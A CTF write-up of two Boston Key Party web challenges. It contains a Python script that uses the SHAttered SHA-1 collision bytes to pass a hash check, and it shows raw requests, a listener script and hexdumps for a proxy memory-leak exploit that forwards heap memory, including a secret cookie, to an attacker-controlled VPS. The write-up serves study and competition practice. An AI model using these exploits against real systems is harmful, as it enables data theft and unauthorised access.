
两道BKP CTF的解答


This week I played BKP (Boston Key Party CTF) alongside the big names from our lab. International CTFs seem to be broader than domestic ones: they expect players to have both binary and web fundamentals. Below are the solutions to two of the web challenges.

Prudentialv2

This challenge is the Prudential challenge from 2015 with its vulnerability fixed.

http://blog.rentjong.net/2015/03/boston-key-party-2015-prudential.html

The source can be read from index.txt: http://54.202.82.13/index.txt

<html>
<head>
    <title>level1</title>
    <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
    $name = (string)$_GET['name'];
    $password = (string)$_GET['password'];
    if ($name == $password) {
        print 'Your password can not be your name.';
    } else if (sha1($name) === sha1($password)) {
        die('Flag: '.$flag);
    } else {
        print '<p class="alert">Invalid password.</p>';
    }
}
?>
<section class="login">
    <div class="title">
        <a href="./index.txt">Level 1</a>
    </div>
    <form method="get">
        <input type="text" required name="name" placeholder="Name"/><br/>
        <input type="text" required name="password" placeholder="Password" /><br/>
        <input type="submit"/>
    </form>
</section>
</body>
</html>

Because both inputs are now cast to (string) and the digests are compared with the strict ===, the 2015 approach no longer works: array parameters cast to the string "Array" on both sides and are rejected as equal, and === leaves no type juggling to abuse. What is needed is a genuine SHA-1 collision: two different strings whose sha1() output is identical.

Conveniently, Google had published the SHA-1 collision paper (SHAttered, https://shattered.io/static/shattered.pdf) two days earlier, so the two sample PDFs released with it can be used to build the inputs.

Trying that directly, the PDFs are far too large (hundreds of kilobytes each) to fit in a URL. But the paper contains this sentence: "This is an identical-prefix collision attack, where a given prefix P is extended with two distinct near-collision block pairs such that they collide for any suffix S." The format figure, https://shattered.it/static/pdf_format.png, shows the same thing: the collision lives in one specific part of the PDF, not the whole file. Concretely, the two files share a 192-byte prefix, followed by two 64-byte near-collision blocks that differ between the files but bring the SHA-1 internal state back to the same value; since SHA-1 is a Merkle-Damgard construction, any identical suffix after that (including the final padding) keeps the digests equal. So the first 320 bytes of each PDF already collide, and that part alone can be hashed and sent.

Take the colliding part of each file, percent-encode the two as the name and password parameters, send the GET request, and the flag comes back.
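The procedure above, as an added example that is not part of the original write-up: a Python script that takes two colliding files, finds the shortest prefix at which they already hash the same (this works for any identical-prefix collision pair, not just SHAttered), checks that pair against a local re-implementation of the challenge's PHP logic, and percent-encodes it into the query string. The 320 collision bytes embedded below are the published prefix of shattered-1.pdf and shattered-2.pdf, transcribed here so the script runs without the PDFs; with the real files, read them and pass them to the same function. The model of PHP's `==` is my approximation of PHP 7's numeric-string rule, not PHP itself.

```python
import hashlib
import re
from urllib.parse import urlencode

SHA1_BLOCK = 64  # SHA-1 compression-function block size in bytes

# Constructed input: the published 320-byte colliding prefix of shattered-1.pdf
# and shattered-2.pdf (https://shattered.io), transcribed so the script runs
# without the PDFs. Bytes 0..191 are identical in both files; the two 64-byte
# near-collision blocks that follow differ but leave the SHA-1 state equal.
COMMON_PREFIX = (
    b"%PDF-1.3\n%\xe2\xe3\xcf\xd3\n\n\n1 0 obj\n<</Width 2 0 R/Height 3 0 R"
    b"/Type 4 0 R/Subtype 5 0 R/Filter 6 0 R/ColorSpace 7 0 R/Length 8 0 R"
    b"/BitsPerComponent 8>>\nstream\n\xff\xd8\xff\xfe\x00$SHA-1 is dead!!!!!"
    b"\x85/\xec\t#9u\x9c9\xb1\xa1\xc6<L\x97\xe1\xff\xfe\x01"
)
BLOCKS_1 = bytes.fromhex(
    "7f46dc93a6b67e013b029aaa1db2560b45ca67d688c7f84b8c4c791fe02b3df6"
    "14f86db1690901c56b45c1530afedfb76038e972722fe7ad728f0e4904e046c2"
    "30570fe9d41398abe12ef5bc942be33542a4802d98b5d70f2a332ec37fac3514"
    "e74ddc0f2cc1a874cd0c78305a21566461309789606bd0bf3f98cda8044629a1"
)
BLOCKS_2 = bytes.fromhex(
    "7346dc9166b67e118f029ab621b2560ff9ca67cca8c7f85ba84c79030c2b3de2"
    "18f86db3a90901d5df45c14f26fedfb3dc38e96ac22fe7bd728f0e45bce046d2"
    "3c570feb141398bb552ef5a0a82be331fea48037b8b5d71f0e332edf93ac3500"
    "eb4ddc0decc1a864790c782c76215660dd309791d06bd0af3f98cda4bc4629b1"
)


def shortest_colliding_prefix(a: bytes, b: bytes):
    """Smallest prefix length (a multiple of the block size) at which the two
    inputs differ yet have the same SHA-1, or None if there is no such prefix.
    SHA-1 is Merkle-Damgard: once the chaining state agrees at a block
    boundary, any identical suffix (including the padding) keeps the digests
    equal, so the shortest such prefix is all that needs to be sent."""
    for n in range(SHA1_BLOCK, min(len(a), len(b)) + 1, SHA1_BLOCK):
        pa, pb = a[:n], b[:n]
        if pa != pb and hashlib.sha1(pa).digest() == hashlib.sha1(pb).digest():
            return n
    return None


# Approximation (assumption) of PHP 7's "numeric string" rule: leading
# whitespace, optional sign, digits, optional fraction and exponent.
_NUMERIC = re.compile(rb"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equal(x: bytes, y: bytes) -> bool:
    """PHP `==` on two strings: both numeric -> compared as numbers (the
    0e-prefixed "magic hash" trap); otherwise compared byte for byte."""
    if _NUMERIC.match(x) and _NUMERIC.match(y):
        return float(x) == float(y)
    return x == y


def prudential_check(name: bytes, password: bytes) -> str:
    """Local model of the challenge's PHP: values already (string)-cast,
    loose == on the raw values, strict === on the sha1() hex digests."""
    if php_loose_equal(name, password):
        return "Your password can not be your name."
    if hashlib.sha1(name).hexdigest() == hashlib.sha1(password).hexdigest():
        return "Flag"
    return "Invalid password."


def build_query(name: bytes, password: bytes) -> str:
    """Percent-encode the two binary blobs as the form's GET parameters;
    urlencode() on bytes values escapes every byte outside the unreserved set."""
    return urlencode({"name": name, "password": password})


if __name__ == "__main__":
    a, b = COMMON_PREFIX + BLOCKS_1, COMMON_PREFIX + BLOCKS_2
    n = shortest_colliding_prefix(a, b)
    print("shortest colliding prefix:", n, "bytes")
    print("sha1 of both:", hashlib.sha1(a[:n]).hexdigest())
    print("local check:", prudential_check(a[:n], b[:n]))
    print("GET /?" + build_query(a[:n], b[:n]))
```

Only the first 320 bytes are sent, so the query string is well under 2 KB even though every byte of the binary blocks is percent-encoded. The numeric-string branch matters for the other way this check is commonly attacked (pairs of digests that both look like `0e...` and compare as 0 == 0); it does not apply here because the colliding blobs start with `%PDF`, and the strict === on the digests rules it out anyway.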

Accelerated.zone

The challenge hands you a reverse proxy. Roughly, what it does:

Port 8000 reverse-proxies to port 7733.
Whatever you request through the proxy, it returns 500.
Reversing the proxy binary shows it is built on this library: https://github.com/rboulton/libmicrohttpd. The logic is roughly: start a server with that library, read the user's request, then spawn curl to fetch the remote content and return it.
The Host header of the request sent to the proxy controls where it forwards: wherever Host points, that is where the server connects.

Later I asked a teammate, who said the challenge leaks memory: send the leaked data to a VPS and read it there. (This is probably why the reverse proxy burns so much memory and CPU after running for a while.)

So send a request to Accelerated with the Host header set to your own VPS, then inspect what arrives there.

The request needs to be a POST with a very large Content-Length, while the body actually sent is only a few bytes (here just 123).

POST / HTTP/1.1
Host: xx.xx.13.97:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 999999999

123

On the VPS the forwarded request shows up. Note what the proxy did with it: the Content-Length was rewritten to 38527, and after our 123 the body continues with whatever the proxy's buffer held, here runs of zeros, pointer-sized values, and text that looks like the container's /etc/hosts:

[root@cloud ~]# nc -l -vv 7733|hexdump -Cv
Connection from 54.218.82.219 port 7733 [tcp/*] accepted
00000000  50 4f 53 54 20 2f 20 48 54 54 50 2f 31 2e 31 0d  |POST / HTTP/1.1.|
00000010  0a 48 6f 73 74 3a 20 31 31 38 2e 39 39 2e 31 33  |.Host: xx.x.xx|
00000020  2e 39 37 3a 37 37 33 33 0d 0a 41 63 63 65 70 74  |.xx:xx..Accept|
00000030  3a 20 2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 4c  |: */*..Content-L|
00000040  65 6e 67 74 68 3a 20 33 38 35 32 37 0d 0a 43 6f  |ength: 38527..Co|
00000050  6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c  |ntent-Type: appl|
00000060  69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f  |ication/x-www-fo|
00000070  72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 45  |rm-urlencoded..E|
00000080  78 70 65 63 74 3a 20 31 30 30 2d 63 6f 6e 74 69  |xpect: 100-conti|
00000090  6e 75 65 0d 0a 0d 0a 31 32 33 00 00 00 00 00 00  |nue....123......|
000000a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
...
000088f0  00 11 7e 00 00 00 00 00 00 b8 07 00 c0 b9 7f 00  |..~.............|
00008900  00 b8 07 00 c0 b9 7f 00 00 e0 92 00 c0 b9 7f 00  |................|
00008910  00 e0 92 00 c0 b9 7f 00 00 74 20 69 70 36 2d 6c  |.........t ip6-l|
00008920  6f 63 61 6c 68 6f 73 74 20 69 70 36 2d 6c 6f 6f  |ocalhost ip6-loo|
00008930  70 62 61 63 6b 0a 66 65 30 30 3a 3a 30 09 69 70  |pback.fe00::0.ip|
00008940  36 2d 6c 6f 63 61 6c 6e 65 74 0a 66 66 30 30 3a  |6-localnet.ff00:|
00008950  3a 30 09 69 70 36 2d 6d 63 61 73 74 70 72 65 66  |:0.ip6-mcastpref|
00008960  69 78 0a 66 66 30 32 3a 3a 31 09 69 70 36 2d 61  |ix.ff02::1.ip6-a|
00008970  6c 6c 6e 6f 64 65 73 0a 66 66 30 32 3a 3a 32 09  |llnodes.ff02::2.|
00008980  69 70 36 2d 61 6c 6c 72 6f 75 74 65 72 73 0a 31  |ip6-allrouters.1|
00008990  37 32 2e 31 37 2e 30 2e 32 09 34 32 39 63 35 37  |72.17.0.2.429c57|
000089a0  64 38 38 31 32 34 0a 72 63 68 20 75 73 2d 77 65  |d88124.rch us-we|
000089b0  73 74 2d 32 2e 63 6f 6d 70 75 74 65 2e 69 6e 74  |st-2.compute.int|
000089c0  65 72 6e 61 6c 0a 00 00 00 00 00 00 00 00 00 00  |ernal...........|

Repeat this a few times and eventually a cookie turns up in the leaked memory:

00007d50  00 00 00 40 87 00 dc 53 7f 00 00 47 87 00 dc 53  |...@...S...G...S|
00007d60  7f 00 00 02 00 00 00 00 00 00 00 73 65 63 72 65  |...........secre|
00007d70  74 00 73 50 62 6b 54 68 62 32 69 4b 59 4f 38 74  |t.sPbkThb2iKYO8t|
00007d80  5a 53 50 49 31 70 71 77 00 00 00 20 87 00 dc 53  |ZSPI1pqw... ...S|
00007d90  7f 00 00 7a 0a 00 dc 53 7f 00 00 8a 0a 00 dc 53  |...z...S.......S|

Cookie: secret=sPbkThb2iKYO8tZSPI1pqw
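Both halves of the procedure above, as an added example that is not part of the original write-up or the challenge: a Python script that builds the oversized-Content-Length probe for the proxy and pulls secrets out of what the listener captures. The VPS address 203.0.113.5, the assumption that the proxy connects to port 7733 of whatever Host names (as the dump above shows), and the SAMPLE_LEAK bytes (constructed to mirror the hexdumps above, including the key NUL value NUL layout of the cookie) are mine, not from the page.

```python
import re
import socket

PROBE_BODY = b"123"             # the body actually sent, as in the write-up
DECLARED_LENGTH = 999_999_999   # the body length we claim to be sending


def build_probe(host_header: str, declared_length: int = DECLARED_LENGTH,
                body: bytes = PROBE_BODY) -> bytes:
    """Raw POST for the proxy: Host tells it where to forward, and
    Content-Length promises far more body than the few bytes that follow."""
    headers = [
        b"POST / HTTP/1.1",
        b"Host: " + host_header.encode(),
        b"Content-Type: application/x-www-form-urlencoded",
        b"Content-Length: " + str(declared_length).encode(),
        b"Connection: close",
    ]
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def split_forwarded(raw: bytes):
    """Split the request the proxy forwarded to us into (headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode()] = value.strip().decode(errors="replace")
    return headers, body


def leaked_region(raw: bytes, sent_body: bytes = PROBE_BODY) -> bytes:
    """Everything in the forwarded body after the bytes we supplied did not
    come from us, so it is the proxy's own memory."""
    _, body = split_forwarded(raw)
    return body[len(sent_body):] if body.startswith(sent_body) else body


def printable_strings(data: bytes, min_len: int = 6):
    """strings(1)-style scan: runs of printable ASCII (tab allowed), which is
    how the /etc/hosts lines and hostnames stand out in the dump."""
    return [m.group().decode() for m in
            re.finditer(rb"[\x09\x20-\x7e]{%d,}" % min_len, data)]


def find_cookie_secret(data: bytes, key: bytes = b"secret"):
    """The dump in the write-up stores the cookie as key NUL value NUL."""
    m = re.search(re.escape(key) + rb"\x00([\x21-\x7e]+)\x00", data)
    return m.group(1).decode() if m else None


def capture_once(listen_port: int) -> bytes:
    """Listener side (what nc -l did): accept one forwarded connection and
    read until the proxy closes it."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", listen_port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            chunks = []
            while True:
                chunk = conn.recv(65536)
                if not chunk:
                    return b"".join(chunks)
                chunks.append(chunk)


def send_probe(proxy_host: str, proxy_port: int, probe: bytes) -> None:
    """Client side: deliver the probe, then drop the connection."""
    with socket.create_connection((proxy_host, proxy_port), timeout=10) as s:
        s.sendall(probe)


# Constructed sample of what the listener receives, modelled on the hexdumps
# above (headers as the proxy rewrote them, our "123", then heap contents).
SAMPLE_LEAK = (
    b"POST / HTTP/1.1\r\nHost: 203.0.113.5:7733\r\nAccept: */*\r\n"
    b"Content-Length: 38527\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    b"Expect: 100-continue\r\n\r\n123" + b"\x00" * 40
    + b"\x02\x00\x00\x00\x00\x00\x00\x00secret\x00sPbkThb2iKYO8tZSPI1pqw\x00"
    + b"\x00\x00 \x87\x00\xdcS\x7f172.17.0.2\t429c57d88124\n" + b"\x00" * 8
)

if __name__ == "__main__":
    headers, _ = split_forwarded(SAMPLE_LEAK)
    print("proxy claimed Content-Length:", headers["content-length"])
    leak = leaked_region(SAMPLE_LEAK)
    print("printable strings:", printable_strings(leak))
    print("Cookie: secret=%s" % find_cookie_secret(leak))
    # Live use (not run offline): run capture_once(7733) on the VPS, then
    # send_probe("accelerated.zone", 8000, build_probe("<vps ip>:8000")).
```

The split between what we sent and what follows is the whole point: the proxy sized its outgoing body from a Content-Length we never honoured, so every byte past our 123 is uninitialised or recycled heap. Scanning that region for printable runs finds the hosts-file text; scanning for the key NUL value NUL pattern finds the cookie directly, which is what repeating the probe until the right allocation comes around eventually yields.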

Then send a request carrying that cookie, and the flag comes back:

GET / HTTP/1.1
Host: accelerated.zone:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: secret=sPbkThb2iKYO8tZSPI1pqw
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 63
Content-Type: text/html; charset=UTF-8
Date: Sun, 26 Feb 2017 03:47:37 GMT

FLAG{ISwearIWroteThisChallengeWeeksAgo}Get better cookies bro.

